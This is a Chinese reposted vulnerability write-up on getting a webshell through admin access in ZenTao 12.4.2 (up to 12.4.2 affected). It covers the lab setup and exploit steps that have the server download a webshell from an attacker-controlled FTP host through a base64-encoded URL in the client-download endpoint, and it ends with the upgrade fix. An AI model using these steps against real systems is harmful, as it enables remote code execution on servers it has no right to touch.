0

0

禅道12.4.2后台管理员权限Getshell是怎样的

WBOY

WBOY

发布时间:2023-05-16 15:43:12

|

1936人浏览过

|

来源于亿速云

转载

0x00简介

禅道是一款专业的国产开源研发项目管理软件,集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,完整覆盖了研发项目管理的核心流程。管理思想基于国际流行的敏捷项目管理方法——Scrum,在遵循其价值观的基础上,结合国内项目研发现状,整合了任务管理、需求管理、Bug管理、用例管理等多种功能,覆盖软件从计划到发布的整个生命周期。

0x01漏洞概述

禅道12.4.2版本存在任意文件下载漏洞,该漏洞是因为client类中download方法中过滤不严谨可以使用ftp达成下载文件的目的。且下载文件存储目录可解析php文件,造成getshell。

0x02影响版本

禅道≤ 12.4.2

0x03环境搭建

phpstudy2018 + 禅道12.4.2  禅道官方下载地址:

https://www.zentao.net/dynamic/zentaopms12.4.2-80263.html

3.1. 下载完成后,放入phpstudy中安装即可

禅道12.4.2后台管理员权限getshell是怎样的

3.2. 检查扩展,要是存在未通过的扩展,在phpstudy中开启扩展即可。

禅道12.4.2后台管理员权限Getshell是怎样的

3.3.设置数据库信息,这里设置成自己的数据库配置。

禅道12.4.2后台管理员权限Getshell是怎样的

3.4.设置账号安装完成

禅道12.4.2后台管理员权限Getshell是怎样的

3.4.利用环境搭建,开启ftp服务,以windows2008R2为例,在添加角色,添加ftp

禅道12.4.2后台管理员权限Getshell是怎样的

禅道12.4.2后台管理员权限Getshell是怎样的

3.5.然后在Internet信息服务下的网站添加ftp服务。

禅道12.4.2后台管理员权限Getshell是怎样的

3.6.根据自己的情况配置,下一步即可

Replit Ghostwrite
Replit Ghostwrite

一种基于 ML 的工具,可提供代码完成、生成、转换和编辑器内搜索功能。

下载

禅道12.4.2后台管理员权限Getshell是怎样的

禅道12.4.2后台管理员权限Getshell是怎样的

禅道12.4.2后台管理员权限Getshell是怎样的

3.7.在ftp目录下放一个webshell然后浏览器查看ftp是否可以正常访问

禅道12.4.2后台管理员权限Getshell是怎样的

0x04漏洞复现

1.首先把ftp加上shell的路径进行base64编码

加密前: ftp://192.168.3.200/shell.php

加密后: ZnRwJTNBLy8xOTIuMTY4LjMuMjAwL3NoZWxsLnBocA==

2.使用EXP,把加密后的base64放入exp中的里

http://127.0.0.1/zentaopms/www/index.php/client-download-1--1.html

禅道12.4.2后台管理员权限Getshell是怎样的

禅道12.4.2后台管理员权限Getshell是怎样的

3.使用以下链接路径测试是否shell已下载到服务器

http://192.168.3.200/zentaopms/www/data/client/1/shell.php

禅道12.4.2后台管理员权限Getshell是怎样的

0x05修复方式

1、升级到禅道12.4.3及之后的版本

相关专题

更多
菜鸟裹裹入口以及教程汇总
菜鸟裹裹入口以及教程汇总

本专题整合了菜鸟裹裹入口地址及教程分享,阅读专题下面的文章了解更多详细内容。

0

2026.01.22

Golang 性能分析与pprof调优实战
Golang 性能分析与pprof调优实战

本专题系统讲解 Golang 应用的性能分析与调优方法,重点覆盖 pprof 的使用方式,包括 CPU、内存、阻塞与 goroutine 分析,火焰图解读,常见性能瓶颈定位思路,以及在真实项目中进行针对性优化的实践技巧。通过案例讲解,帮助开发者掌握 用数据驱动的方式持续提升 Go 程序性能与稳定性。

9

2026.01.22

html编辑相关教程合集
html编辑相关教程合集

本专题整合了html编辑相关教程合集,阅读专题下面的文章了解更多详细内容。

56

2026.01.21

三角洲入口地址合集
三角洲入口地址合集

本专题整合了三角洲入口地址合集,阅读专题下面的文章了解更多详细内容。

51

2026.01.21

AO3中文版入口地址大全
AO3中文版入口地址大全

本专题整合了AO3中文版入口地址大全,阅读专题下面的的文章了解更多详细内容。

397

2026.01.21

妖精漫画入口地址合集
妖精漫画入口地址合集

本专题整合了妖精漫画入口地址合集,阅读专题下面的文章了解更多详细内容。

118

2026.01.21

java版本选择建议
java版本选择建议

本专题整合了java版本相关合集,阅读专题下面的文章了解更多详细内容。

3

2026.01.21

Java编译相关教程合集
Java编译相关教程合集

本专题整合了Java编译相关教程,阅读专题下面的文章了解更多详细内容。

16

2026.01.21

C++多线程相关合集
C++多线程相关合集

本专题整合了C++多线程相关教程,阅读专题下面的的文章了解更多详细内容。

11

2026.01.21

热门下载

更多
网站特效
/
网站源码
/
网站素材
/
前端模板

精品课程

更多
相关推荐
/
热门推荐
/
最新课程
Golang进阶实战编程
Golang进阶实战编程

共34课时 | 2.7万人学习

关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送

Copyright 2014-2026 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号